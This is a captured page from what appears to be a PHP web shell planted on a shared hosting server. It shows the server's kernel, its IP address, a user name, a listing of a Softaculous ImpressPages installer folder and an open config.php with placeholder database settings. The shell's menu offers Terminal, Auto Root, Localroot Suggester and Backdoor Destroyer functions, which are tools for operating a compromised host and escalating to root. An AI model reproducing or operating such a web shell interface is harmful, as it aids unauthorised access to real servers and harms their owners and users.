Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
impresspage /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-05-04 12:48
php53
[ DIR ]
drwxr-xr-x
2024-05-04 12:48
php56
[ DIR ]
drwxr-xr-x
2024-05-04 12:48
php71
[ DIR ]
drwxr-xr-x
2024-05-04 12:48
php81
[ DIR ]
drwxr-xr-x
2024-05-04 12:48
php82
[ DIR ]
drwxr-xr-x
2024-05-04 12:48
PasswordHash.php
6.74
KB
-rw-r--r--
2021-12-23 00:54
clone.php
5.88
KB
-rw-r--r--
2024-05-02 01:19
config.php
820
B
-rw-r--r--
2021-12-23 00:54
edit.php
4.37
KB
-rw-r--r--
2024-05-02 01:19
edit.xml
433
B
-rw-r--r--
2021-12-23 00:54
fileindex.php
107
B
-rw-r--r--
2021-12-23 00:54
import.php
4.5
KB
-rw-r--r--
2024-05-02 01:19
impresspage.sql
17.08
KB
-rw-r--r--
2024-05-04 12:48
impresspage.zip
5.44
MB
-rw-r--r--
2024-05-04 12:48
info.xml
4.18
KB
-rw-r--r--
2024-05-02 00:25
install.js
921
B
-rw-r--r--
2021-12-23 00:54
install.php
4.89
KB
-rw-r--r--
2024-05-02 01:19
install.xml
1.25
KB
-rw-r--r--
2021-12-23 00:54
md5
6.56
KB
-rw-r--r--
2024-05-02 01:19
notes.txt
455
B
-rw-r--r--
2021-12-23 00:54
upgrade.php
3.52
KB
-rw-r--r--
2024-05-02 01:19
upgrade.xml
1.17
KB
-rw-r--r--
2021-12-23 00:54
Save
Rename
<?php /** * @package ImpressPages */ return [ 'sessionName' => 'ses[[SESSION_NAME]]', // prevents session conflict when two sites runs on the same server 'developmentEnvironment' => 1, // displays error and debug information. Change to 0 before deployment to production server 'showErrors' => 1, // 0 if you don't wish to display errors on the page 'debugMode' => 0, // Debug mode loads raw unminified JavaScript files, alerts AJAX errors. 'timezone' => 'America/New_York', // PHP 5 requires timezone to be set. 'db' => array ( 'hostname' => '[[softdbhost]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'tablePrefix' => '[[dbprefix]]', 'database' => '[[softdb]]', 'charset' => 'utf8', ), // Database configuration ];